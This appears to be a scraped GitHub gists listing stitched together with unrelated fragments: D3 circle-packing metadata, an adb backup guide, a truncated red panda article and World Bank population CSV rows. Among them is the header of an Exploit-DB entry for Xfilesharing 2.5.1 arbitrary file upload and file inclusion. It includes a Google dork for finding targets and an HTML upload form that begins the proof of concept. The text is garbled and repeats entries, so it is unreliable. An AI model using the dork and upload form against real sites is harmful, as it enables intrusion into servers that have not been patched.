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weisk / .block
Created April 12, 2020 06:53 — forked from mbostock/.block
Circle Packing
license: gpl-3.0
height: 960
border: no
An attacker can call following functions as an unauthenticated user.
weisk / Exploit-DB-Xfilesharing.txt
Created May 13, 2020 01:27 — forked from pak0s/Exploit-DB-Xfilesharing.txt
Xfilesharing <=2.5.1 Arbitrary File Upload and Local File Inclusion
# Exploit Title: Xfilesharing <=2.5.1 Arbitrary File Upload and Local File Inclusion
# Google Dork: inurl:/?op=registration
# Date: 14th Nov, 2019
# Exploit Author: Noman Riffat
# Vendor Homepage:
# Version: <=2.5.1
# CVE : CVE-2019-18951, CVE-2019-18952
Arbitrary File Upload
weisk / xfilesharing.txt
Created May 13, 2020 01:27 — forked from pak0s/xfilesharing.txt
Xfilesharing <=2.5.1 Arbitrary File Upload and Local File Inclusion
Arbitrary File Upload
<form action="" method="post" enctype="multipart/form-data">
<input type="text" name="sid" value="joe">
<input type="file" name="file">
<input type="submit" value="Upload" name="submit">
weisk / xfilesharing.txt
Created May 13, 2020 01:27 — forked from pak0s/xfilesharing.txt
Xfilesharing <=2.5.1 Arbitrary File Upload and Local File Inclusion
Arbitrary File Upload
<form action="" method="post" enctype="multipart/form-data">
<input type="text" name="sid" value="joe">
<input type="file" name="file">
<input type="submit" value="Upload" name="submit">
weisk / .block
Created May 28, 2020 02:57 — forked from mbostock/.block
Zoomable Circle Packing
license: gpl-3.0
height: 960
### my-script — does one thing well
### Usage:
### my-script <input> <output>
### Options:
### <input> Input file to read.
### <output> Output file to write. Use '-' for stdout.
weisk /
Created August 8, 2020 09:16 — forked from AnatomicJC/
Backup android app, data included, no root needed, with adb

Backup android app, data included, no root needed, with adb

adb is the Android CLI tool with which you can interact with your android device, from your PC

You must enable developer mode (tap 7 times on the build version in parameters) and install adb on your PC.

Fetch application APK

To get the list of your installed applications:

The Red Panda

The red panda is dwarfed by the black-and-white giant that shares its name. These pandas typically grow to the size of a house cat, though their big, bushy tails add an additional 18 inches. The pandas use their ringed tails as wraparound blankets in the chilly mountain heights.


The red panda (Ailurus fulgens) is a mammal species native to the eastern Himalayas and southwestern China. It is listed as Endangered on the IUCN Red List because the wild population is estimated at fewer than 10,000 mature individuals and continues to decline due to habitat loss and fragmentation, poaching, and inbreeding depression. Despite its name, it is not closely related to the giant panda.

The red panda has reddish-brown fur, a long, shaggy tail, and a waddling gait due to its shorter front legs; it is roughly the size of a domestic cat, though with a longer body, and is somewhat heavier. It is arboreal and feeds mainly on bamboo, but also eats eggs, birds, and insects. It is a solitary animal, m

Series Name,Series Code,Country Name,Country Code,2016 [YR2016]
"Population, total",SP.POP.TOTL,Afghanistan,AFG,34656032
"Population, total",SP.POP.TOTL,Albania,ALB,2876101
"Population, total",SP.POP.TOTL,Algeria,DZA,40606052
"Population, total",SP.POP.TOTL,American Samoa,ASM,55599
"Population, total",SP.POP.TOTL,Andorra,AND,77281
"Population, total",SP.POP.TOTL,Angola,AGO,28813463
"Population, total",SP.POP.TOTL,Antigua and Barbuda,ATG,100963
"Population, total",SP.POP.TOTL,Argentina,ARG,43847430
"Population, total",SP.POP.TOTL,Armenia,ARM,2924816